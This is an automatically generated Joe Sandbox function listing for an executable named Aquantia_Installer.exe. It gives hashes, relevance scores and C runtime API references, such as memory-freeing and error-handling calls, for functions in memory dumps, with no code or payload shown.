Source File: 00000000.00000002.2351072545.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2351051052.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_Aquantia_Installer.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 5d580b6aa84ec14a5a26ad5fae176bf7c8bb27b9b16dba312ceb6d05e17e376f
Instruction ID: fedd9ca6e91e964815924d05a8a7a7db78393ff571b8be054ed03477693a082c
Opcode Fuzzy Hash: 5d580b6aa84ec14a5a26ad5fae176bf7c8bb27b9b16dba312ceb6d05e17e376f
Instruction Fuzzy Hash: 8431DF711183049BD310DF18D8C16ABBBF4EBC6324F14992CEAD887290D331A4488BA6

Function 6CF33EAD Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 6CF33EAD

Memory Dump Source

Source File: 00000000.00000002.2353815089.000000006CF21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF20000, based on PE: true

Associated: 00000000.00000002.2353800006.000000006CF20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353842214.000000006CF3A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353916067.000000006CF8F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf20000_Aquantia_Installer.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 4e8a349a9aaf4966f329c9b5f329edda3092a268d96e621f2cbcee623262a666
Instruction ID: bc7905876b3b209a4b3471d40d1f59382862d5d721bcb3195be2a4f9c12df7a6
Opcode Fuzzy Hash: 4e8a349a9aaf4966f329c9b5f329edda3092a268d96e621f2cbcee623262a666
Instruction Fuzzy Hash: 9CA01130B222008BAF808E3282883083BFAAA0328030A0028A008C0000EA2088A0AAC0

Function 01021270 Relevance: .6, Instructions: 644COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2351072545.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2351051052.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_Aquantia_Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f39d522379ad40aae35da3725a3813add9555377534b12a985beb8e37557a53
Instruction ID: ae05cb7be0ae304f9cb277c38eefb98230c2377812e4557fc89169a6b1f319a5
Opcode Fuzzy Hash: 7f39d522379ad40aae35da3725a3813add9555377534b12a985beb8e37557a53
Instruction Fuzzy Hash: CB624871508FC18ED3728B3C8849796BFD56B6A324F084A9DD0FA8B3D2D3B4A505C766

Function 01031550 Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2351072545.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2351051052.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_Aquantia_Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f926f161f65c4bb02c8ebdc0555aac8b9d9481d3e87fd870cc4a3c8b7d376920
Instruction ID: c2b067ce4dcc7a77c8d2c160ff8363bf2f44672c12bcd01b4504e0813cbf6da6
Opcode Fuzzy Hash: f926f161f65c4bb02c8ebdc0555aac8b9d9481d3e87fd870cc4a3c8b7d376920
Instruction Fuzzy Hash: 69A12837F1999187C7198A7C8C513ADAA9B5FDE230B2E8379D8F69B3D1D63988024350

Function 010417D0 Relevance: .3, Instructions: 275COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2351072545.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2351051052.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_Aquantia_Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81c2e1500d7c54553f5b72f22875fc6859ab6a43d2963d94d6a64c82c973ad84
Instruction ID: e58bf5172c4bfa8f83f2dffd7a65c8e5a3f4f38eab33fda32b63ebcddd803bb0
Opcode Fuzzy Hash: 81c2e1500d7c54553f5b72f22875fc6859ab6a43d2963d94d6a64c82c973ad84
Instruction Fuzzy Hash: F08191746083029FE715DF1DC890A6AB7E2FF99350F19896CEAC48B365D731E891CB42

Function 0101F500 Relevance: .3, Instructions: 269COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2351072545.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2351051052.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_Aquantia_Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b248b3193c8cc356776cf4c4b6dddaa70b915cc7ac97db3671264d6b30661511
Instruction ID: c04eb2162c2127afc1b1ed203d6bd217290ba987da0743487a327c27cf564047
Opcode Fuzzy Hash: b248b3193c8cc356776cf4c4b6dddaa70b915cc7ac97db3671264d6b30661511
Instruction Fuzzy Hash: 47812B72A042624FC716CE2CC85035ABBD1AB85264F19C67DE8F9DB3D6D679CC4983C1

Function 0101FF40 Relevance: .2, Instructions: 233COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2351072545.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2351051052.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_Aquantia_Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f7141a4655e551e75dd933aa4856814fa4c73579676074ff72206410a357981
Instruction ID: b673172d22f478acad8083665d58a9fa0982db1f5bb4a4d41699fc5f303a84b6
Opcode Fuzzy Hash: 1f7141a4655e551e75dd933aa4856814fa4c73579676074ff72206410a357981
Instruction Fuzzy Hash: 4371E837B56AA14793248D7C4C412A9AA571BE7134B3EC3BAEDF45B3E5C5BA8C064380

Function 6CF21000 Relevance: .2, Instructions: 227COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2353815089.000000006CF21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF20000, based on PE: true

Associated: 00000000.00000002.2353800006.000000006CF20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353842214.000000006CF3A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353916067.000000006CF8F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf20000_Aquantia_Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6442eb1fd7af9a22d9a9283743da660da99369db3c6425bde2065012f387402
Instruction ID: c67081714722a1d9f24613e99a2b98529111206035523817917da1a3a0544adb
Opcode Fuzzy Hash: a6442eb1fd7af9a22d9a9283743da660da99369db3c6425bde2065012f387402
Instruction Fuzzy Hash: 1B71A976A152468FDB04CEFCC9917EEBBF2EB4A314F208115E415E7A80C63ADD05CB69

Function 01032FD0 Relevance: .2, Instructions: 214COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2351072545.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2351051052.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_Aquantia_Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef81046b9e8353ef4a7d09ec96efab5827aaa14c00266810f0cccc7e7b2ce03d
Instruction ID: 55713f89347604b0bd20c917e27c4285472bdc93ef6be67747fa8236db98646d
Opcode Fuzzy Hash: ef81046b9e8353ef4a7d09ec96efab5827aaa14c00266810f0cccc7e7b2ce03d
Instruction Fuzzy Hash: 70612E37E599D14BC7154E7C5CA12BDAA5B6BD3130B2E83BAECF15F3D1C629480683A0

Function 010386B0 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2351072545.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2351051052.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_Aquantia_Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa089a12e49fe4722f46bbcd436e3cf85ce1ee6a1726378f89a8ebfb9a03aae6
Instruction ID: 8801dc5dd0d3f2ca99ca2045f78e2ddfc0be2bb17b6f910651167da648f5f733
Opcode Fuzzy Hash: aa089a12e49fe4722f46bbcd436e3cf85ce1ee6a1726378f89a8ebfb9a03aae6
Instruction Fuzzy Hash: 38516CB16087548FE314DF29D89435BBBE5BBC4318F048E2EE5E987351E379D6088B82

Function 0102B1E0 Relevance: .2, Instructions: 175COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2351072545.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2351051052.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_Aquantia_Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e90bab415c10ff1a789613c66bb3a92337d11cceb8dd92cc69c2d2a1782b6dcf
Instruction ID: 62974823f5dc1de9ea191a038513b04f53dfaeba129f51a8a29651d6cf9a9c8f
Opcode Fuzzy Hash: e90bab415c10ff1a789613c66bb3a92337d11cceb8dd92cc69c2d2a1782b6dcf
Instruction Fuzzy Hash: B551D571604B108BD735CE2DD8D066BFBF1AF863147188B6DD8E68B792D730E9098790

Function 01039BA0 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2351072545.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2351051052.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_Aquantia_Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 347d65627b2d4b62f440fb59d031725257537ebfb9ecdb4bfd198b290f6305fe
Instruction ID: e74c77384c39383ca9410745af759eda1ebb0b7aa2a178b4c608e65aa0e61537
Opcode Fuzzy Hash: 347d65627b2d4b62f440fb59d031725257537ebfb9ecdb4bfd198b290f6305fe
Instruction Fuzzy Hash: 0431E7B5A143096BE710DB19DC80B6B7BDDEFD135CF048478E9C697252E272E805C692

Function 6CF3229A Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2353815089.000000006CF21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF20000, based on PE: true

Associated: 00000000.00000002.2353800006.000000006CF20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353842214.000000006CF3A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353916067.000000006CF8F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf20000_Aquantia_Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d52fb2acaea47cc711755e886856fc2c512988177476dc3ebe6c672e5574d84
Instruction ID: c7c5fd175460f5423bde68df54e3f1f4d23259375714df2623b57ad8f5daeb99
Opcode Fuzzy Hash: 8d52fb2acaea47cc711755e886856fc2c512988177476dc3ebe6c672e5574d84
Instruction Fuzzy Hash: 6AE08C32916238FBCB10CB8CC944D8AB3FCEB88A44B110496B515D3601C270DE00C7E0

Function 6CF34C89 Relevance: 19.6, APIs: 13, Instructions: 113
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___free_lconv_mon.LIBCMT ref: 6CF34CCD

Part of subcall function 6CF36BB7: _free.LIBCMT ref: 6CF36BD4
Part of subcall function 6CF36BB7: _free.LIBCMT ref: 6CF36BE6
Part of subcall function 6CF36BB7: _free.LIBCMT ref: 6CF36BF8
Part of subcall function 6CF36BB7: _free.LIBCMT ref: 6CF36C0A
Part of subcall function 6CF36BB7: _free.LIBCMT ref: 6CF36C1C
Part of subcall function 6CF36BB7: _free.LIBCMT ref: 6CF36C2E
Part of subcall function 6CF36BB7: _free.LIBCMT ref: 6CF36C40
Part of subcall function 6CF36BB7: _free.LIBCMT ref: 6CF36C52
Part of subcall function 6CF36BB7: _free.LIBCMT ref: 6CF36C64
Part of subcall function 6CF36BB7: _free.LIBCMT ref: 6CF36C76
Part of subcall function 6CF36BB7: _free.LIBCMT ref: 6CF36C88
Part of subcall function 6CF36BB7: _free.LIBCMT ref: 6CF36C9A
Part of subcall function 6CF36BB7: _free.LIBCMT ref: 6CF36CAC

_free.LIBCMT ref: 6CF34CC2

Part of subcall function 6CF325A4: HeapFree.KERNEL32(00000000,00000000,?,6CF317DC), ref: 6CF325BA
Part of subcall function 6CF325A4: GetLastError.KERNEL32(?,?,6CF317DC), ref: 6CF325CC

_free.LIBCMT ref: 6CF34CE4
_free.LIBCMT ref: 6CF34CF9
_free.LIBCMT ref: 6CF34D04
_free.LIBCMT ref: 6CF34D26
_free.LIBCMT ref: 6CF34D39
_free.LIBCMT ref: 6CF34D47
_free.LIBCMT ref: 6CF34D52
_free.LIBCMT ref: 6CF34D8A
_free.LIBCMT ref: 6CF34D91
_free.LIBCMT ref: 6CF34DAE
_free.LIBCMT ref: 6CF34DC6

Memory Dump Source

Source File: 00000000.00000002.2353815089.000000006CF21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF20000, based on PE: true

Associated: 00000000.00000002.2353800006.000000006CF20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353842214.000000006CF3A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353916067.000000006CF8F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf20000_Aquantia_Installer.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 8039e775162742d8ef8245b343fd6e855d26de8dd66bde687d285d842df8e596
Instruction ID: b9131c9c2cafefc2a561ac8983cafda48ad1bfb52f96d9d3619ba83c250beb5c
Opcode Fuzzy Hash: 8039e775162742d8ef8245b343fd6e855d26de8dd66bde687d285d842df8e596
Instruction Fuzzy Hash: C331A231604721BFEB168A79D845B8A7FE4EF40359F206419E46DD7A50DF32EA44CBE0

Function 6CF31E63 Relevance: 15.1, APIs: 10, Instructions: 69
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_free.LIBCMT ref: 6CF31E79

Part of subcall function 6CF325A4: HeapFree.KERNEL32(00000000,00000000,?,6CF317DC), ref: 6CF325BA
Part of subcall function 6CF325A4: GetLastError.KERNEL32(?,?,6CF317DC), ref: 6CF325CC

_free.LIBCMT ref: 6CF31E85
_free.LIBCMT ref: 6CF31E90
_free.LIBCMT ref: 6CF31E9B
_free.LIBCMT ref: 6CF31EA6
_free.LIBCMT ref: 6CF31EB1
_free.LIBCMT ref: 6CF31EBC
_free.LIBCMT ref: 6CF31EC7
_free.LIBCMT ref: 6CF31ED2
_free.LIBCMT ref: 6CF31EE0

Memory Dump Source

Source File: 00000000.00000002.2353815089.000000006CF21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF20000, based on PE: true

Associated: 00000000.00000002.2353800006.000000006CF20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353842214.000000006CF3A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353916067.000000006CF8F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf20000_Aquantia_Installer.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 89e607f257bffda1cef013b828c52fd416ffed337086e275c35c6e0c40e14a80
Instruction ID: 9cf954ba70fe0f514cfd5cb4094da0fb4a5304f1bc042bf1f6ee9a56d324bc3d
Opcode Fuzzy Hash: 89e607f257bffda1cef013b828c52fd416ffed337086e275c35c6e0c40e14a80
Instruction Fuzzy Hash: BA21F476910118BFCF46DFA4C995DDE7BB8AF48244F0091A6A5099B621DB32EB48CFD0

Function 01009580 Relevance: 12.8, Strings: 10, Instructions: 287
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

bLHN, xrefs: 010095F0
=;;8, xrefs: 01009664
559, xrefs: 0100967C
]\, xrefs: 010096F9
NE, xrefs: 010095DC
<8.>, xrefs: 01009684
7;50, xrefs: 0100966C
", xrefs: 01009700
>#, xrefs: 01009674
DvEU, xrefs: 01009580

Memory Dump Source

Source File: 00000000.00000002.2351072545.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2351051052.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_Aquantia_Installer.jbxd

Similarity

API ID:
String ID: "$559$7;50$<8.>$=;;8$>#$DvEU$NE$]\$bLHN
API String ID: 0-1299258786
Opcode ID: 4af797183462da662cd56a78a9d35b40f1d34d7270037a1acc0aea5cb2638b7a
Instruction ID: af29ee2f4ea484549d1f4adf5694dff1279b0bba92662108f08b1426f0b57097
Opcode Fuzzy Hash: 4af797183462da662cd56a78a9d35b40f1d34d7270037a1acc0aea5cb2638b7a
Instruction Fuzzy Hash: 2271D66510C3C28FE7128F29845476BFFE1AF92218F18899DE4D9972C7C779C50AC762

Function 6CF30440 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 6CF30477
___except_validate_context_record.LIBVCRUNTIME ref: 6CF3047F
_ValidateLocalCookies.LIBCMT ref: 6CF30508
__IsNonwritableInCurrentImage.LIBCMT ref: 6CF30533
_ValidateLocalCookies.LIBCMT ref: 6CF30588

Strings

csm, xrefs: 6CF3051D

Memory Dump Source

Source File: 00000000.00000002.2353815089.000000006CF21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF20000, based on PE: true

Associated: 00000000.00000002.2353800006.000000006CF20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353842214.000000006CF3A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353916067.000000006CF8F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf20000_Aquantia_Installer.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 128111c820be73e86b73498dfaf1663998cf69bae3ec1611ef0ba1d340615690
Instruction ID: 692540e678d0b710ba2e6336ff2aa9736bb3dbb9622ff19462e35ad9107490ed
Opcode Fuzzy Hash: 128111c820be73e86b73498dfaf1663998cf69bae3ec1611ef0ba1d340615690
Instruction Fuzzy Hash: E241A434E011A8BBCF10CF69C844A9EBBB5AF45318F109156E82C6B751D7B1DA05CFE0

Function 6CF33ACB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

Strings

api-ms-, xrefs: 6CF33B22
ext-ms-, xrefs: 6CF33B36

Memory Dump Source

Source File: 00000000.00000002.2353815089.000000006CF21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF20000, based on PE: true

Associated: 00000000.00000002.2353800006.000000006CF20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353842214.000000006CF3A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353916067.000000006CF8F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf20000_Aquantia_Installer.jbxd

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: fcedd9d8cf162492e6db9b5356e6907e3a1dd44110cd44ec11fe5f8e5276bcd4
Instruction ID: 322e9a37977eb7a34bd467be6d9c7e21e696e153010505cb56a6aa2e3e768ac6
Opcode Fuzzy Hash: fcedd9d8cf162492e6db9b5356e6907e3a1dd44110cd44ec11fe5f8e5276bcd4
Instruction Fuzzy Hash: 1E210872E01231BBDF21CA6A8C44B5E3768EF027A5F213511E91DAB691E730EC0AC5E0

Function 6CF36D56 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 6CF36D1E: _free.LIBCMT ref: 6CF36D43

_free.LIBCMT ref: 6CF36DA4

Part of subcall function 6CF325A4: HeapFree.KERNEL32(00000000,00000000,?,6CF317DC), ref: 6CF325BA
Part of subcall function 6CF325A4: GetLastError.KERNEL32(?,?,6CF317DC), ref: 6CF325CC

_free.LIBCMT ref: 6CF36DAF
_free.LIBCMT ref: 6CF36DBA
_free.LIBCMT ref: 6CF36E0E
_free.LIBCMT ref: 6CF36E19
_free.LIBCMT ref: 6CF36E24
_free.LIBCMT ref: 6CF36E2F

Memory Dump Source

Source File: 00000000.00000002.2353815089.000000006CF21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF20000, based on PE: true

Associated: 00000000.00000002.2353800006.000000006CF20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353842214.000000006CF3A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353916067.000000006CF8F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf20000_Aquantia_Installer.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 74abff0297f89508d370d25e7923fd1f494c8f40879c02b314269e353b2f71c9
Instruction ID: 27749e1716e68ff4dd6ee4bc6f255515a2e45931759bdb0af67f277b17d5ddd1
Opcode Fuzzy Hash: 74abff0297f89508d370d25e7923fd1f494c8f40879c02b314269e353b2f71c9
Instruction Fuzzy Hash: 01118671540B29BAD6A2ABB0CC0BFCBB79C7F04708F501815B29DE6A51DBB5B61C47D0

Function 6CF35E6F Relevance: 9.3, APIs: 6, Instructions: 317fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 6CF35EB7
__fassign.LIBCMT ref: 6CF3609C
__fassign.LIBCMT ref: 6CF360B9
WriteFile.KERNEL32(?,6CF34654,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CF36101
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6CF36141
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CF361E9

Memory Dump Source

Source File: 00000000.00000002.2353815089.000000006CF21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF20000, based on PE: true

Associated: 00000000.00000002.2353800006.000000006CF20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353842214.000000006CF3A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353916067.000000006CF8F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf20000_Aquantia_Installer.jbxd

Similarity

API ID: FileWrite__fassign$ConsoleErrorLastOutput
String ID:
API String ID: 1735259414-0
Opcode ID: 2f84018d91e28b7ddcc9f8c60b2ce54c8b78908d5240a85627e53b40e545824a
Instruction ID: 9dc4c150061962cce3aaaa7a4c4c6bcef220a74091099415318fe419182ac010
Opcode Fuzzy Hash: 2f84018d91e28b7ddcc9f8c60b2ce54c8b78908d5240a85627e53b40e545824a
Instruction Fuzzy Hash: 41C19F75D01268AFCF11CFE8C8809EDBBB5BF09314F28516AE859FB641D731A946CB90

Function 6CF30917 Relevance: 9.1, APIs: 6, Instructions: 60COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000001,?,6CF305E5,6CF2F710,6CF2F129,?,6CF2F361,?,00000001,?,?,00000001,?,6CF3F120,0000000C,6CF2F45A), ref: 6CF30925
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6CF30933
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6CF3094C
SetLastError.KERNEL32(00000000,6CF2F361,?,00000001,?,?,00000001,?,6CF3F120,0000000C,6CF2F45A,?,00000001,?), ref: 6CF3099E

Memory Dump Source

Source File: 00000000.00000002.2353815089.000000006CF21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF20000, based on PE: true

Associated: 00000000.00000002.2353800006.000000006CF20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353842214.000000006CF3A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353916067.000000006CF8F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf20000_Aquantia_Installer.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: b31a55cde450b340c9daf01bedab8197a89e6328ab1266d436d360d4cbc9d084
Instruction ID: 5092a44fe52ab24ad62a74f27202ae2a444747a2d0d188463f6b3ca6ad9bc73e
Opcode Fuzzy Hash: b31a55cde450b340c9daf01bedab8197a89e6328ab1266d436d360d4cbc9d084
Instruction Fuzzy Hash: 0501523361B276BDBB541A7A5C84A9B37B8DB076B9720232BE12C95BD0EB91480592C4

Function 6CF32E10 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

C:\Users\user\Desktop\Aquantia_Installer.exe, xrefs: 6CF32E15

Memory Dump Source

Source File: 00000000.00000002.2353815089.000000006CF21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF20000, based on PE: true

Associated: 00000000.00000002.2353800006.000000006CF20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353842214.000000006CF3A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353861216.000000006CF40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353916067.000000006CF8F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf20000_Aquantia_Installer.jbxd

Similarity

API ID:
String ID: C:\Users\user\Desktop\Aquantia_Installer.exe
API String ID: 0-475832001
Opcode ID: 6575070135c9434486b56a8e3c552bb1c8895769459ceaae629435c75b56e5b6
Instruction ID: c2c044c22efcd0af9caca641ebd60860a4ec46d1ce6235aff51335416c752573
Opcode Fuzzy Hash: 6575070135c9434486b56a8e3c552bb1c8895769459ceaae629435c75b56e5b6
Instruction Fuzzy Hash: F621B372604229BF9B109B668C899C777ADAF013687046614F91C97E92DB32ED818BE0

Function 6CF30A93 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,?,6CF30B54,00000000,?,00000001,00000000,?,6CF30BCB,00000001,FlsFree,6CF3AD3C,FlsFree,00000000), ref: 6CF30B23

Strings

api-ms-, xrefs: 6CF30AE3

Memory Dump Source

Source File: 00000000.00000002.2353815089.000000006CF21000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF20000, based on PE: true

Associated: 00000000.00000002.2353800006.000000006CF20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2353842214.000000006CF3A000.00000002.00000001.01000000.00000007.sdmpDownload File
